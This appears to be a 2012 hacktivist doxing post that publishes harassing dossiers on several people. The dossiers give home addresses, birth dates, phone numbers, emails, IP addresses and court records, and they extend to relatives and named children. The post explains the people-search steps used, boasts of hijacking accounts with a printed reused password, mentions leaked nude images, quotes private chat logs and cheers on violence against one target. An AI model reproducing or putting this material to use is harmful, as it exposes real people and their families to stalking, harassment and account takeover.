As he would say.....insert another quarter
https://twitter.com/Le_Researcher/status/192158258243436544
Ohhhhhhh boy
https://twitter.com/Le_Researcher/status/196204309610897409
Cocky dumbass rofl
https://twitter.com/Le_Researcher/status/196206664913915904
Lol......no?
https://twitter.com/Le_Researcher/status/196379671007473664
I'm gonna have to say what's up sometime
https://twitter.com/Le_Researcher/status/197597414532710400
Yeah he cares so much right?
https://twitter.com/Le_Researcher/status/200685238563782661
He does research?
https://twitter.com/Le_Researcher/status/204897014792728576
The ugly blogpost that owned LeRes
https://twitter.com/Le_Researcher/status/210135976427782146
HAHAHAHAHAHAHAHA
https://twitter.com/Le_Researcher/status/211365545637978112
Le Americans kicked his sorry Dutch ass
https://twitter.com/Le_Researcher/status/211528903154610177
LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL
https://twitter.com/Le_Researcher/status/213047058616160257
Does he mean a bunch of pseudo security researchers?
https://twitter.com/Le_Researcher/status/213258817453047808
LOLOLOLOL
https://twitter.com/Le_Researcher/status/213265398957748225
Metasploit = DNS poisoning? Interesting
https://twitter.com/Le_Researcher/status/214740432570159104
..........No? Rofl
https://twitter.com/Le_Researcher/status/215929123711885312
Soulja Boy, but yeah....UGNazi is gone!
https://twitter.com/Le_Researcher/status/216991320206618625
Bad guys always win....what moves you been watching?
https://twitter.com/Le_Researcher/status/219863536489349122
How LeRes dun goofed
https://twitter.com/Le_Researcher/status/245465740029882368
Rofl wat
https://twitter.com/Le_Researcher/status/253153237778186240
More faildox
https://twitter.com/Le_Researcher/status/255093320932540416
Me please
https://twitter.com/Le_Researcher/status/257915092308471809
http://media.tumblr.com/tumblr_mcflh31Im61qih9gi.gif
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
JackalAnon of YourAnonNews D0X
"If you think you can do something better than me, do it. Until then, shut the
fuck up because you're not doing shit."
- Jackal (Source: https://twitter.com/JackalAnon/status/258938260624130048)
Challenge accepted. (details on the wrong d0x before, and how he was found this
time at the bottom)
Name
Christopher Michael Banks (also comes up as McHenry cause of a divorce)
DOB 05/12/1983 (lol your birthday isn't on Nov. 5 quit lying)
(Thought to be) Current address
7202 131st Pl, Thornton, CO 80602
Last address
13365 All American Rd, Fishers, IN, US (before he left his wife and went to
Colorado with Emmi)
Old addresses
7105 Shrewsbury Ln, Apt H, Indianapolis, IN 46260
18821 Wychwood Pl, Noblesville, IN 46062
1249 Blackwood Ct, Mooresville, IN 46158
10714 Lakeview Dr, Carmel, IN 46033
1108 Indian Trl, Carmel, IN 46032
Last known #:
(317) 774-5461
IP/DDoS number: 174.16.121.161
Usernames:
cbanks_rides_fixed
CBanks
cbanksindy
cbanksdenver
EMails
CBanks.indy@gmail.com
CBanks.indy@yahoo.com
4SqINDY@gmail.com
jackalanon@gmail.com
jackal.anon@gmail.com
youranonnews@gmail.com
Website
http://4sqindy.com/ (havent checked for SQLi yet)
"@cbanksindy\ -Does #Anonymous have anything planed for midnight on the us.gov
page? http://bit.ly/fw6aQn"
Pics // All of these are in Jackal.zip
http://s11.postimage.org/471r1gztf/57889579.jpg
http://s17.postimage.org/n2al9tli7/jackal2.jpg
http://s7.postimage.org/6y1vb2pm3/jackal3.jpg
http://postimage.org/image/t47qy4d5j/
http://s8.postimage.org/q4stjbmp1/jackal5.jpg (What a badass)
http://postimage.org/image/53vb7v51r/
Pics of his dog/kids/phone/misc just cause LOL
http://s11.postimage.org/mxqt95o43/jackalsdog.jpg
http://s15.postimage.org/rk2ezq4rf/jackalskids.jpg
http://s10.postimage.org/cupita9uh/jackalskids2.jpg
http://s12.postimage.org/q5iw2x5kt/jackalskids3.jpg
http://s18.postimage.org/ljwacwnu1/jackalsphone.jpg
thought I'd seperate this from the rest seeing as its probably the most comical
pic ever
Obama tattoo
http://s17.postimage.org/m1exyftwf/jackalstat.jpg
Social Media (had to make this seperate from Twitters cause well...look down LOL
)
http://facebook.com/CBanks.Indy (hidden most likely)
http://facebook.com/ColtsInsider
http://facebook.com/4SqINDY
http://foursquare.com/jackalanon
http://myspace.com/cbanks_rides_fixed
http://pandora.com/people/ekone5
http://plus.google.com/106623925566718797667/posts
http://youtube.com/user/CBanksIndy
http://youtube.com/user/4sqindy
http://s1266.photobucket.com/profile/JackalAnon
http://favstar.fm/users/CBanksIndy
http://ebay.com/cbanksindy/
http://twitpic.com/photos/CBanksIndy (prepare to laugh, hard)
http://twicsy.com/u/CBanksIndy
http://last.fm/user/cbanksindy
http://justin.tv/cbanksindy
http://mapmyfitness.com/profile/3639070/ (LOL fatass)
http://songbliss.com/CbanksIndy
http://iate.com/profile/cbanksindy (LOOOOOOOOOOOOOOOOOL)
http://gramsby.me/users/followers/cbanksindy
http://shareaholic.com/cbanksindy
http://tl.gomiso.com/u/cbanksindy
http://cbanksindy.wordpress.com (deleted)
http://indybluecrew.org/forum/member.php?1638-CBanks
Twitters (he also shares this with his gf no doubt)
http://twitter.com/CBanksDenver (created 03/16/2009) (was originally CBanksIndy.
deleted LOL)
http://twitter.com/JackalAnon (created 08/27/2011)
http://twitter.com/YourAnonNews (created 04/08/2011)
http://twitter.com/YourAnonWeather (created 06/07/2012)
http://twitter.com/YourAnonMusic (created 07/28/2012)
http://twitter.com/YourAnonNudes (created 06/08/2012)
http://twitter.com/YourAnonNoms (created 07/07/2012)
http://twitter.com/SexyFawkes (created 07/13/2011)
http://twitter.com/sqindy (created 09/11/2011)
http://twitter.com/Colts_Insider (created 12/25/2009)
http://twitter.com/arlik1968 (created 09/19/2011) (lol fake profiles)
http://twitter.com/EANDJ4LYFE (created 09/16/2011)
Judgement against him (maybe that's why he's such a revolutionary now!)
Type: CIVIL JUDGMENT | Amount: $3,843
Court: MARION COUNTY SUPERIOR COURT - 2
Case Number: 49D020901PL001734
Date Filed: 03/31/2009
Debtor Address: 13365 ALL AMERICAN RD, FISHERS, IN 46037
Creditor: ALLIED PROPERTY AND CASUALTY
------------------------------------------------------------------------------
http://www.cageprisoners.com/our-work/interviews/item/3993-cageprisoners-exclusi
ve-ayesha-kazmi-interviews-jackal-and-emmi-of-hacktivist-group-anonymous
"“Jackal”: I can speak for what I fight for as I will only speak for myself. I
have a long history in animal rights, environmental rights, and human rights. I
don't like to see people suffer and our world being taken advantage of. The only
tactic I used is “d0xing”. I think this is a way to get back at just one person.
I find it useful.I use the internet like a toolto find and spread of information
in my “d0x” to make my point. My fight is the fight for information to be free,
and for the wrongdoers to be wronged."
LOL let's hope a cop he doxed kicks his door in and beats him with a phone book.
http://the-duck-pond-blog.blogspot.com/2012/09/im-anonymous-please-donate.html
// Aside from mistaking Emmi's outlines for real ink (The pictures in Emmi.zip
tell the tale), this blog sounds spot on.
------------------------------------------------------------------------------
Ex-Wife (LOL)
Patricia Meghann McHenry (last name was Banks til she left his ass LOL)
age 32
born in New Palestine, IN
DOB 05/**/1980
patricia8@juno.com
Phone #'s:
(317) 773-5887
(317) 891-9999
(317) 861-8457
(317) 861-0751
Old addresses
13365 All American Rd,, Fishers, IN 46037 (last address known)
4857 Stonehaven Ln, #W New Palestine, IN 46163
4172 S Creekside Dr, New Palestine, IN 46163
3853 Candle Berry Dr, Indianapolis, IN 46235
Usernames: meghann.banks, duckie287
Social Media
facebook.com/meghann.banks
myspace.com/duckie827
twitter.com/duckie827
pinterest.com/duckie827
plus.google.com/106574535792925870635/posts
ebay.com/sch/duckie827/m.html
Indiana University-Purdue University-Indianapolis
Indianapolis,Indiana
Graduated: 2002
Student status: Alumni
Degree: Bachelor's Degree
Major: Criminal Justice
Minor: Psychology
1998 to 2002
New Palestine High School
New Palestine,Indiana
Graduated: 1998
Student status: Alumni
Degree: High School Diploma
Names of kids he abandoned (nice)
Victoria Krystianne Banks
Kamrynne Savannah Banks
Bankruptcies
Date Filed: 09/23/2010 | Chapter: 13 | Filing Type: INDIVIDUAL
Discharge Date: | Disposition:
Case Number: 1014401 | Court Location: INDIANAPOLIS
Date Filed: 03/26/2010 | Chapter: 13 | Filing Type: INDIVIDUAL
Discharge Date: month09day21year2010 | Disposition: Dismissed
Case Number: 1004168 | Court Location: INDIANAPOLIS
Judgements
Type: SMALL CLAIMS JUDGMENT | Amount: $585
Court: HAMILTON COUNTY / SUPERIOR CT #4
Case Number: 29D050612SC2869
Date Filed: 01/17/2007
Debtor Address: 3853 CANDLE BERRY DR, INDIANAPOLIS, IN 46235
Creditor: MED 1 SOLUTIONS LLC
Type: SMALL CLAIMS JUDGMENT | Amount: $1,335
Court: HANCOCK COUNTY CT/SUPERIOR CT #2
Case Number: 30D020804SC00480
Date Filed: 11/07/2008
Debtor Address: 13365 ALL AMERICAN RD, FISHERS, IN 46037
Creditor: KIDS CORNER DAYCARE LLC
Type: CIVIL JUDGMENT | Amount: $905
Court: HAMILTON CIRCUIT COURT
Case Number: 29C010907CC001323
Date Filed: 09/08/2009
Debtor Address: 13365 ALL AMERICAN RD, FISHERS, IN 46037
Creditor: AMERICAN ACCEPTANCE CO LLC
Type: CIVIL JUDGMENT | Amount: $7,192
Court: HAMILTON SUPERIOR COURT #1
Case Number: 29D010912CC001514
Date Filed: 01/13/2010
Debtor Address: 13365 ALL AMERICAN RD, FISHERS, IN 46037
Creditor: GMG MOTORS INC
Type: CIVIL NEW FILING | Amount: Unavailable
Court: HAMILTON COUNTY / SUPERIOR CT #4
Case Number: 29D051109SC9483
Date Filed: 09/20/2011
Debtor Address: 13365 ALL AMERICAN RD, FISHERS, IN 46037
Creditor: JENNIFER HANSHAW
-------------------------------------------------------------------------------
Mom
Beverly Ruth Banks (maiden name Brandt)
age 56
DOB 09/09/1955
https://foursquare.com/v/the-house-of--brandt/4be217841dd22d7f265e93bd (LOL)
Current address
1249 Blackwood Ct, Mooresville, IN 46158
Old addresses
18821 Wychwood Pl, Noblesville, IN 46062
10714 Lakeview Dr, Carmel, IN 46033
1108 Indian Trl, Carmel, IN 46032
Phone #
(317) 846-5027
Social Media
plus.google.com/114542611163945103925/posts
-------------------------------------------------------------------------------
Dad
Johnathon Timothy Banks
age 57
DOB 05/13/1955
https://foursquare.com/v/the-house-of--brandt/4be217841dd22d7f265e93bd
Current address
1249 Blackwood Ct, Mooresville, IN 46158
Old addresses
18821 Wychwood Pl, Noblesville, IN 46062
10714 Lakeview Dr, Carmel, IN 46033
1108 Indian Trl, Carmel, IN 46032
Phone #
(317) 846-5027
Social Media
myspace.com/58352866
-------------------------------------------------------------------------------
Brother (same one who was on his Google+)
(I'm also not going to bother d0xing his wife, although it can be done!)
Timothy James Banks
age 27
Medical Lake, WA
Current address
508 W Brooks Rd, Medical Lake, WA 99022
PO Box
Po Box 1020, Medical Lake, WA 99022 (hope he likes random porn magazines)
Old addresses
10826 Belmont Cir, Indianapolis, IN 46280
3727 Oaklawn Dr, Anderson, IN 46013
Phone #
(765) 393-0502
Social Media
myspace.com/oracle5891
Carmel High School
Carmel,Indiana
Graduated: 2003
Student status: Alumni
Degree: High School Diploma
Jackal's d0x was supposed to be funny for us, of course at that time we really
had little to no information about the guy other than he was a guy named
Christopher Banks and was 29 years old, who moved to Denver, CO to be with
Emmi. some of his friends who were tired of him being an egofag on YAN came up
and gave us some info and pointed out how our d0x was wrong.
so lets start from the top, his twitter twitter.com/JackalAnon
1 he follows https://twitter.com/nflcolts the official Twitter of the Indiana
Colts. Jackal is known to be a Colts fan.
(mirror: http://s9.postimage.org/q7z523za7/mirror1.png)
2 we got tipped off he was d0xed before as Chris Banks a while back, as well
as that he has a kid with his ex wife and was married with her until 2009 or
so. result of searching: http://twibbon.com/CBanksDenver (mirror:
http://s16.postimage.org/t5fcf3fid/mirror2.png)
3 notice how Christopher Banks in that profile is also a Colts fan? lol funny.
then we found this: plus.google.com/106623925566718797667/posts
(mirror: http://s8.postimage.org/lj6asc8bp/mirror3.png)
4 guess he forgot to delete that when he tried to delete his CBanksDenver
Twitter. if he hasnt deleted it yet notice he has Emmi (his gf, no mirror
needed......you cant be that stupid) as a friend on his Google Plus, as well
as an account related to Anonymous (pretty much self-d0xed himself, lol idiot).
(mirror: http://s8.postimage.org/6pw8lbpyd/mirror4.png)
5 but what also caught our eye was he had a person named Tim Banks as well as
a friend (.....) as well as other personal friends who we want to keep out
unless he retaliates (names saved).
(mirror: http://s14.postimage.org/mj1bj1ttt/mirror5.png)
6 Tim Banks's profile. trust me this is important for later
(mirror: http://s17.postimage.org/xkohhhqn3/mirror6.png)
7 do a search Timothy Banks in Medical Lake, WA on many sites but we did
Intelius. (mirror: http://s16.postimage.org/q25w3m2px/mirror7.png)
8 at this point we thought we were stumped because we thought Jackal's middle
name was Lee. so we tried a search on Beverly Ruth Banks, which we noticed then
she lived in Indiana, where Indianapolis is, the home town of the Colts,
Jackal's favorite team.
(mirror: http://s13.postimage.org/v2odrryt3/mirror8.png)
9 look up Christopher Banks on peekyou.com under USA then Indiana and clicked
on the Christopher Banks in Noblesville, IN. to our surprise we found "Possible
Relatives: Beverly, John, Patricia." and as well as a Christopoher MICHAEL
Banks. (mirror: http://s16.postimage.org/qkjf2fltx/mirror9.png)
10 went back to peoplefinders.com did a search ona Christopher M Banks to our
surprise (look at mirror if you're too lazy to look it up) a 29 year old
Christopher M Banks with the relatives we found before
(mirror: http://s13.postimage.org/mpsc7yvav/mirror10.png)
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
"When ppl RT my old nekkid pics it makes me lol" - EisMC2
This dox was a lot of fun. We thought this one would be hard, because according
to our friends inside Anon, Jackal had supposedly scrubbed Emmi's dox from the
Internet when they got together. The included screenshots tell the story of
just how well Jackal scrubbed her, but here's a summary: Kick "EisMC2" into
pipl, Ctrl+F for "Cohen." Fiddle around with "Amelia Cohen" some, and you'll
stumble upon her MySpace (Username: d3ceased). Start playing with d3ceased, and
you'll eventually find "Quackert," which leads to her photobucket (Which
contains a pic of her deadmau5 syringe tattoo, the same one she's tweeted
pictures of in the past from @EisMC2). Also, we decided to go for the bonus
round and got all her nudes off of Sexy Fawkes (They're in Emmi.zip). There's
your meat and potatos. Now, for the gravy:
Amelia Hale Cohen
DOB 11/28/1990
Last known address: 7202 131st Pl Thornton, CO 80602
Last known number: (303) 278-8061
Old address: 42 Wyckoff Ave, Ramsey, NJ 07446
Old number: (201) 327-4971
Emails: incipit_interregnum@yahoo.com (main) | ameliahc@aol.com (connected to
her MySpace) | ameliahc@gmail.com | keepsmereeling@aol.com |
assassinatedyouth@yahoo.com
AOL: TeterOnTheEdge | Skype: r0cks0cks | Yahoo: Incipit_Interregnum |
Yahoo: AssassinatedYouth (she has 2)
Usernames: EisMC2 | Un1fi3dThe0ry | d3ceased | Quackert | feelmyscwerlywrath
"...I got kicked out of public school early...And when I was in Elementary I
was a Brown Bagger...I'm a picky eater. Duh. So. Yep. I know what the piggy
blanket things are....My friend Shira loves to go un-kosher for them....but
that's a different story...But are Beanie Weenies just a myth in Iowa or
something?" - http//ligersdungeon.proboards.com/index.cgi?action=display&board=
devildog&thread=151&page=1
"into: Occupying, being legion, not forgiving, not forgetting, expecting you to
expect me. IRL hax0rz" - http://suicidegirls.com/members/Un1fi3dThe0ry/
Fucking magnets, how do they work?
facebook.com/profile.php?id=1344450019
myspace.com/58504411
twitter.com/EISMC2
suicidegirls.com/members/Un1fi3dThe0ry/
incipit.interregnum.tumblr.com/
ustream.tv/user/Un1fi3dThe0ry
s13.zetaboards.com/Hatchet_Warriors/profile/74107/ (LOL)
mixmap.com/user_page.php?user_id=58438
slaveregister.com/p/956-166-253/
ligersdungeon.proboards.com/index.cgi?action=viewprofile&user=feelmyscwerlywrath
bebo.com/Profile.jsp?MemberId=8915807161
quackert.deviantart.com/
secure.gravatar.com/quackert
secure.flickr.com/people/22263163@N06
secure.flickr.com/people/40614304@N02
kongregate.com/accounts/Quackert
s671.photobucket.com/albums/vv72/quackert/ (really is anymore confirmation
needed?) (also are these pics familiar?)
s1105.photobucket.com/profile/EisMC2
https://www.youtube.com/user/Quackert2
-------------------------------------------------------------------------------
Eric Nicholas Cohen (bro who she mentions living with)
Current address: 7202 131st Pl, Thornton, CO 80602
Last known addresses: 42 Wyckoff Ave, Ramsey, NJ 07446 | 1550 Platte St,
Denver, CO 80202
Phone numbers: 303-278-8061 (most likely current) | 303-564-8359 | 201-327-4971
| 201-716-5919 | 720-497-1202 | 303-922-8711 | 973-335-8691 |
-------------------------------------------------------------------------------
Random notes, tweets, and links:
she's from NJ (shes also a devils fan)
also a fan of the NY Rangers https://twitter.com/EisMC2/status/205530478772621
313
following twitter.com/investmentguru
said:
@thoughtxriot @anti_flag ahahaha. U must live in South Jersey... I lived by the
City on border of Ny state. Also #AntiFlagFTW
@ImH0me @MClarissa LOL I lived in the ghetto of New Jersey, a place called
Paterson, for 2 years. They are god fearing people. Who happen to
(https://twitter.com/EisMC2/statuses/90806937180053504)
(https://twitter.com/Centr1/status/99956926670061568)
EisMC2
Time: 14:23
99953215956729858
@Centr1 LOL I lived for nearly 20 years about 20m outside the city... Trust me,
Jersey's way moar sick and twisted :P
@ladygaga please show @StephzillaNJ a sign that you got her book! Threw onstage
in Newark 4/22! Titled "Glitter And Grease"
her piercing shop???
MClarissa ?@MClarissa
@EisMC2 @Yox2814 wheres ur shop located
Details
Reply
Retweet
Favorite
Emmi Einstein Emmi Einstein ?@EisMC2
@MClarissa @Yox2814 Pleasurable Piercing in Hawthorne NJ
Reply
Retweet
Favorite
3:39 PM - 31 Jul 11 via web · Embed this Tweet
Don’t miss any updates from Emmi Einstein Join Twitter today and follow what
interests you!
Text follow EisMC2 to 40404 in the United States
© 2012 Twitter
About
Help
(https://webcache.googleusercontent.com/search?q=cache:tkmZyKCm70gJ:twitter.com
/EisMC2/statuses/97798464343252993+&cd=3&hl=en&ct=clnk&gl=us)
https://twitter.com/ItsTechLeech/statuses/141225896286765057 her birthday
Tech Leech Official Tech Leech Official ?@ItsTechLeech
RT @CabinCr3w: Everyone tell Emmi happy birthday!!! RT @JackalAnon: @EisMC2
happy birthday baby!
following twitter.com/investmentguru search on peekyou.com lead to his
pinterest pinterest.com/jamesperales (compare pictures of both profiles)
search james perales in new jersey, us on peekyou.com - James Richard Perales
in NJ comes up http://www.intelius.com/redir.php?refer=5354&adword=ps&search2=1
-kJvvdgNQYUo7N5qGBEYM7PPH87-CBHMYNma2nr0DwCaEIEcA8U9UJgy05tG0qLRQZIXhQ2v4OlzGkU
2zWejn0DAcRF-oVvZQdi7VuRJL2c2f1Ko&profileid=08EXJRGE3SK
https://twitter.com/CabinCr3w/status/115288150854742016 lol love
https://twitter.com/CabinCr3w/status/130484142327611392 emmi getting beat 1
// Apparently, she's 5'2" 95lbs
https://twitter.com/CabinCr3w/status/130484595996110850 emmi getting beat 2
https://twitter.com/CabinCr3w/status/132992564981796864
https://twitter.com/EisMC2/status/250412690533666818
https://twitter.com/i/#!/EisMC2/media/slideshow?url=pic.twitter.com%2F1PBWBSTN
https://twitter.com/JackalAnon/statuses/246966763361800192 // medic? Hmmm
https://twitter.com/EisMC2/status/216211858695270400
https://twitter.com/EisMC2/status/225932524663222272
https://twitter.com/EisMC2/status/226800968531079168
https://twitter.com/EisMC2/status/237934146171838464/photo/1 // WILL SHOW TITS
// FOR RETWEETS
https://twitter.com/EisMC2/status/201398723044061184
https://twitter.com/EisMC2/status/199643329670025216 // lol BDSM
https://twitter.com/EisMC2/status/199608602951036928 // spanking party
https://twitter.com/EisMC2/status/198745387908083712
https://twitter.com/EisMC2/status/195926701258186752 // Sleeve art.
// @Ghostpickles is stated to be the one doing the art
https://twitter.com/EisMC2/status/195128165465731072
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
This entry in the pwned lineup has MalSec ties and is a self-proclaimed "old
#antisec" member who is so antisec, that he re-used the same password
("pinkeltje111") for most of his accounts. About a week after joepie stumbled
on the cryto logs, some anons tried owning our network. We decided to retaliate
by tearing down one high profile anon, to send a message. Comically enough,
Discordian never changed his passes on his other accounts, so he made the
retaliation easy. We grabbed his spools (Mostly not worth dropping, since they
largely consist of twitter/youtube notifications, but they're here anyway) and
hijacked every account we could. Here are the results:
Name: Geis Eijkelboom // Or "G J G Eijkelboom, which is straight off his
// Paypal, which we couldn't get into due to not knowing his first school or
the name of his first pet
DOB: 01/08/1993 // He uses various DOBs, most of which have 11/05 as the
month/date. This one seems the most credible)
Pics: https://twitter.com/TheTimeShifter/status/190673686280421376 // Also
// included in the files. Look for AqVotRsCQAI2K-z.jpg
// Sexy Fawkes nudes are in Discordian.zip, as well.
IP: 77.162.55.23 resolves to ip4da23717.direct-adsl.nl // Thanks, GMail!
Skype: Gardenslayer // LOL HACKED
E-mail addresses:
gardenslayer@gmx.com // LOL HACKED, also associated with paypal and digid.nl
gardenslayer@gmail.complex // LOL HACKED
Pastebin: http://pastebin.com/u/DiscordiAnon
http://pastebin.com/u/Discordian // LOL HACKED
https://www.twitter.com/AnonCollective // LOL HACKED. DMs and the YourAnonNews
// 2.0 Guide can be found in the release files.
https://www.twitter.com/DiscoriAnon // LOL DELETED
https://www.twitter.com/Gardenslayer // LOL HACKED
http://vimeo.com/gardenslayer // LOL HACKED
https://www.youtube.com/user/GardenslayerComm?feature=watch // LOL HACKED
lolgs:
[PM] LadyICE -> Gardenslayer : how was your day?
[PM] Gardenslayer -> LadyICE : Well, we had the squat meeting, we
found somewhere to squat (4 houses next to each other, with 8 people to live
in)
[PM] LadyICE -> Gardenslayer : tell me about squatting
[PM] Gardenslayer -> LadyICE : There are more empty houses with no destination
than homeless people
[PM] Gardenslayer -> LadyICE : So why would you spend so much money on a home
while you can live in a house without destination?
[PM] Gardenslayer -> LadyICE : As soon as there is a plan for the house we move
out
[PM] Gardenslayer -> LadyICE : and pick a new one
[PM] Gardenslayer -> LadyICE : squatting often happens with a demonstration
[PM] LadyICE -> Gardenslayer : but isn't it illegal now?
[PM] Gardenslayer -> LadyICE : It is illegal, but it is for the police to
decide if they do something about it, and sometimes you can even arrange a
contract with the owner
[PM] Gardenslayer -> LadyICE : And yes, there is a chance of getting caughtr
[PM] Gardenslayer -> LadyICE : *caught
[PM] LadyICE -> Gardenslayer : so, you and joepie will be sharing a house?
[PM] Gardenslayer -> LadyICE : Sadly we will
[PM] LadyICE -> Gardenslayer : baby
[PM] LadyICE -> Gardenslayer : at least you know whom you will be living with
[PM] Gardenslayer -> LadyICE : true :)
[PM] Gardenslayer -> LadyICE : but i absolutely hate his rants
[PM] LadyICE -> Gardenslayer : and you know it's someone you can trust and rely
upon
[PM] Gardenslayer -> LadyICE : and him trying to control everything around him
[PM] Gardenslayer -> LadyICE : including me
If you want to see more, grep the cryto logs for Discordian and LadyICE, and
look for the conversation in which they talk about joepie and disco being
former lovers. Such fine reading material.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
Kiernan Higbee
1729 Barclay Rd
Tampa, FL 33613
United States
8138432147
// The above is straight off of Paypal, and the address etc are also on his
//UPS.com profile
Alt phone: +18139337729
Some mail drop info:
Dear Frank Morgan,
We are writing to let you know that we have received your order.
The details of this order are printed below. You have chosen to pay for this
order with Discover.
Order ID: # EV-20483
Order Date: 05/31/2012 09:35:00 pm
Customer ID: KiernanSerenity@yahoo.com
Billing Information:
Frank morgan
120 Sasser Dr
New Mexico, NM 88101
9518 N Oakleaf Ave
tampa, FL 33612
Dear Kiernan,
Thank you for your response. Our tracking records indicate that this
shipment was incorrectly delivered on 06/07/12 at 12:28 PM to the
following address:
3602 N 55TH ST
TAMPA FL 33619
This shipment was signed for by the following individual:
SIMPSON
'my friend's google chrome auto fill in messed up the name . it should be
shipped to tampa florida , 1726 barclay rd kiernan higbee'
===============================================================================
Some random account-related info
IPs: 71.180.234.62 // Used Sep 15-16
173.65.93.171 // Used Sep 15
62.234.180.71.in-addr.arpa domain name pointer
pool-71-180-234-62.tampfl.fios.verizon.net.
171.93.65.173.in-addr.arpa domain name pointer
pool-173-65-93-171.tampfl.fios.verizon.net.
Skype: prime.prime5, Mobingangprime, primethegoon
Xbox Live: You, Diamond, P for Prime
E-mail accounts:
KiernanSerenity@yahoo.com // LOL HACKED
Dynasty@live.com // LOL HACKED
superkingprime@gmail.com // LOL HACKED
teamdefiancesite@gmail.com // LOL HACKED
tyga@aol.com // LOL HACKED
crutchhhh@gmail.com // LOL HACKED
sm0k3nac3z@hotmail.com // LOL HACKED
contrailing@hotmail.com
===============================================================================
Premium whois info
Registered through: GoDaddy.com, LLC (http://www.godaddy.com)
Domain Name: DOXBIN.NET
Created on: 25-Sep-12
Expires on: 25-Sep-14
Last Updated on: 25-Sep-12
Registrant:
Jonathan Ferreira // lol dead guy
11102 teegreen rd
tampa, Florida 33613
United States
Administrative Contact:
Ferreira, Jonathan tyga@aol.com
1724 barclay rd
tampa, Florida 33613
United States
(813) 843-2146
Technical Contact:
Ferreira, Jonathan tyga@aol.com
1724 barclay rd
tampa, Florida 33613
United States
(813) 843-2146 // This number is also on his UPS.com profile
Domain servers in listed order:
NS21.DOMAINCONTROL.COM
NS22.DOMAINCONTROL.COM
Registry Status: clientDeleteProhibited
Registry Status: clientRenewProhibited
Registry Status: clientTransferProhibited
Registry Status: clientUpdateProhibited
===============================================================================
UPDATE: New whois since we demolished him (Prime's own fumbling lead to this):
Domain Name: DOXBIN.NET
Registrar: GODADDY.COM, LLC
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
Name Server: NS2.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
Status: clientDeleteProhibited
Status: clientRenewProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 28-sep-2012
Creation Date: 25-sep-2012
Expiration Date: 25-sep-2014
===============================================================================
Now, we dig his domain...
; (()) DiG 9.8.1-P1 (()) doxbin.net
;; global options: +cmd
;; Got answer:
;; -))HEADER((- opcode: QUERY, status: NOERROR, id: 43843
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;doxbin.net. IN A
;; ANSWER SECTION:
doxbin.net. 3600 IN A 97.74.42.79
;; Query time: 498 msec
;; SERVER: 192.168.0.1#53(192.168.0.1)
;; WHEN: Thu Sep 27 03:28:30 2012
;; MSG SIZE rcvd: 44
===============================================================================
And last but not least, we whois the IP...
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=97.74.42.79?showDetails=true&showARIN=false
&ext=netref2
NetRange: 97.74.0.0 - 97.74.255.255
CIDR: 97.74.0.0/16
OriginAS: AS26496
NetName: GO-DADDY-COM-LLC
NetHandle: NET-97-74-0-0-1
Parent: NET-97-0-0-0-0
NetType: Direct Allocation
Comment: Please send abuse complaints to abuse@godaddy.com
RegDate: 2008-08-14
Updated: 2012-02-24
Ref: http://whois.arin.net/rest/net/NET-97-74-0-0-1
OrgName: GoDaddy.com, LLC
OrgId: GODAD
Address: 14455 N Hayden Road
Address: Suite 226
City: Scottsdale
StateProv: AZ
PostalCode: 85260
Country: US
RegDate: 2007-06-01
Updated: 2012-03-15
Comment: Please send abuse complaints to abuse@godaddy.com
Ref: http://whois.arin.net/rest/org/GODAD
OrgAbuseHandle: ABUSE51-ARIN
OrgAbuseName: Abuse Department
OrgAbusePhone: +1-480-624-2505
OrgAbuseEmail: abuse@godaddy.com
OrgAbuseRef: http://whois.arin.net/rest/poc/ABUSE51-ARIN
OrgNOCHandle: NOC124-ARIN
OrgNOCName: Network Operations Center
OrgNOCPhone: +1-480-505-8809
OrgNOCEmail: noc@godaddy.com
OrgNOCRef: http://whois.arin.net/rest/poc/NOC124-ARIN
OrgTechHandle: NOC124-ARIN
OrgTechName: Network Operations Center
OrgTechPhone: +1-480-505-8809
OrgTechEmail: noc@godaddy.com
OrgTechRef: http://whois.arin.net/rest/poc/NOC124-ARIN
RAbuseHandle: ABUSE51-ARIN
RAbuseName: Abuse Department
RAbusePhone: +1-480-624-2505
RAbuseEmail: abuse@godaddy.com
RAbuseRef: http://whois.arin.net/rest/poc/ABUSE51-ARIN
RTechHandle: NOC124-ARIN
RTechName: Network Operations Center
RTechPhone: +1-480-505-8809
RTechEmail: noc@godaddy.com
RTechRef: http://whois.arin.net/rest/poc/NOC124-ARIN
RNOCHandle: NOC124-ARIN
RNOCName: Network Operations Center
RNOCPhone: +1-480-505-8809
RNOCEmail: noc@godaddy.com
RNOCRef: http://whois.arin.net/rest/poc/NOC124-ARIN
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
